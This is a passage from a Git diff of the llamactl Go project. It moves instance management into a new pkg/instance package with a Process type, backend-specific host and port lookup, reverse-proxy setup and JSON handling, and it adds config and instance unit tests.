t.Errorf("Expected args ['serve', '--debug'], got %v", settings.Args)
}
if settings.Docker != nil && settings.Docker.Enabled {
t.Error("Expected Docker to be disabled or nil")
}
// Test MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "custom-mlx" {
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
}
}
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
bc := &config.BackendConfig{}
// Test empty llama-cpp
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty vLLM
settings = bc.GetBackendSettings("vllm")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
}
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
// Test that backend environment variables work correctly
envVars := map[string]string{
"LLAMACTL_LLAMACPP_COMMAND": "env-llama",
"LLAMACTL_LLAMACPP_ARGS": "--verbose --threads 4",
"LLAMACTL_LLAMACPP_DOCKER_ENABLED": "true",
"LLAMACTL_LLAMACPP_DOCKER_IMAGE": "env-llama:latest",
"LLAMACTL_LLAMACPP_DOCKER_ARGS": "run --rm --network host --gpus all",
"LLAMACTL_LLAMACPP_DOCKER_ENV": "CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4",
"LLAMACTL_VLLM_COMMAND": "env-vllm",
"LLAMACTL_VLLM_DOCKER_ENABLED": "false",
"LLAMACTL_VLLM_DOCKER_IMAGE": "env-vllm:latest",
"LLAMACTL_VLLM_DOCKER_ENV": "PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,CUDA_VISIBLE_DEVICES=1",
"LLAMACTL_MLX_COMMAND": "env-mlx",
}
// Set env vars and ensure cleanup
for key, value := range envVars {
os.Setenv(key, value)
defer os.Unsetenv(key)
}
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
// Verify llama-cpp environment overrides
if cfg.Backends.LlamaCpp.Command != "env-llama" {
t.Errorf("Expected llama command 'env-llama', got %q", cfg.Backends.LlamaCpp.Command)
}
expectedArgs := []string{"--verbose", "--threads", "4"}
if len(cfg.Backends.LlamaCpp.Args) != len(expectedArgs) {
t.Errorf("Expected llama args %v, got %v", expectedArgs, cfg.Backends.LlamaCpp.Args)
}
if !cfg.Backends.LlamaCpp.Docker.Enabled {
t.Error("Expected llama Docker to be enabled")
}
if cfg.Backends.LlamaCpp.Docker.Image != "env-llama:latest" {
t.Errorf("Expected llama Docker image 'env-llama:latest', got %q", cfg.Backends.LlamaCpp.Docker.Image)
}
expectedDockerArgs := []string{"run", "--rm", "--network", "host", "--gpus", "all"}
if len(cfg.Backends.LlamaCpp.Docker.Args) != len(expectedDockerArgs) {
t.Errorf("Expected llama Docker args %v, got %v", expectedDockerArgs, cfg.Backends.LlamaCpp.Docker.Args)
}
if cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"] != "0" {
t.Errorf("Expected CUDA_VISIBLE_DEVICES=0, got %q", cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"])
}
if cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"] != "4" {
t.Errorf("Expected OMP_NUM_THREADS=4, got %q", cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"])
}
// Verify vLLM environment overrides
if cfg.Backends.VLLM.Command != "env-vllm" {
t.Errorf("Expected vLLM command 'env-vllm', got %q", cfg.Backends.VLLM.Command)
}
if cfg.Backends.VLLM.Docker.Enabled {
t.Error("Expected vLLM Docker to be disabled")
}
if cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"] != "max_split_size_mb:512" {
t.Errorf("Expected PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512, got %q", cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"])
}
// Verify MLX environment overrides
if cfg.Backends.MLX.Command != "env-mlx" {
t.Errorf("Expected MLX command 'env-mlx', got %q", cfg.Backends.MLX.Command)
}
}
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
}
// Test invalid backend type returns empty settings
settings := bc.GetBackendSettings("invalid-backend")
if settings.Command != "" {
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
}
}

View File

@@ -1,270 +0,0 @@
package llamactl
import (
"context"
"encoding/json"
"fmt"
"io"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"time"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Instance represents a running instance of the llama server
type Instance struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
// Status
Running bool `json:"running"`
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
return &Instance{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
Running: false,
Created: time.Now().Unix(),
}
}
func (i *Instance) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options and apply defaults
optionsCopy := validateAndCopyOptions(i.Name, options)
applyDefaultOptions(optionsCopy, i.globalSettings)
i.options = optionsCopy
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
return nil
}
i.proxy = proxy
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
}
return json.Marshal(temp)
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{}
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
}
return nil
}

276
pkg/instance/instance.go Normal file
View File

@@ -0,0 +1,276 @@
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// Process represents a running instance of an inference backend (llama.cpp, MLX, or vLLM)
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalInstanceSettings *config.InstancesConfig
globalBackendSettings *config.BackendConfig
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// NewInstance creates a new instance from the given name, backend and instance configuration, options, and status-change callback
func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalInstanceSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
return &Process{
Name: name,
options: options,
globalInstanceSettings: globalInstanceSettings,
globalBackendSettings: globalBackendSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
}
}
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Port
}
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Host
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Host
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Host
}
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
host = i.options.MlxServerOptions.Host
port = i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
host = i.options.VllmServerOptions.Host
port = i.options.VllmServerOptions.Port
}
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
return nil
}
i.proxy = proxy
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Process
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Determine if docker is enabled for this instance's backend
var dockerEnabled bool
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeVllm:
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeMlxLm:
// MLX does not support docker currently
}
}
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
}{
Alias: (*Alias)(i),
Options: i.options,
DockerEnabled: dockerEnabled,
})
}
// UnmarshalJSON implements json.Unmarshaler for Process
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = aux.Options
}
return nil
}

View File

@@ -0,0 +1,465 @@
package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
)
func TestNewInstance(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if inst.IsRunning() {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestGetProxy(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"status": "running",
"options": {
"auto_restart": false,
"max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.IsRunning() {
t.Error("Expected status to be running")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
}
if opts.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "valid positive values",
maxRestarts: testutil.IntPtr(10),
restartDelay: testutil.IntPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: testutil.IntPtr(0),
restartDelay: testutil.IntPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: testutil.IntPtr(-5),
restartDelay: testutil.IntPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
})
}
}

View File

@@ -1,21 +1,25 @@
package llamactl
package instance
import (
"context"
"fmt"
"log"
"net/http"
"os/exec"
"runtime"
"syscall"
"time"
"llamactl/pkg/backends"
"llamactl/pkg/config"
)
// Start starts the llama server instance and returns an error if it fails.
func (i *Instance) Start() error {
func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.Running {
if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name)
}
@@ -30,15 +34,22 @@ func (i *Instance) Start() error {
i.restarts = 0
}
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create log files
if err := i.logger.Create(); err != nil {
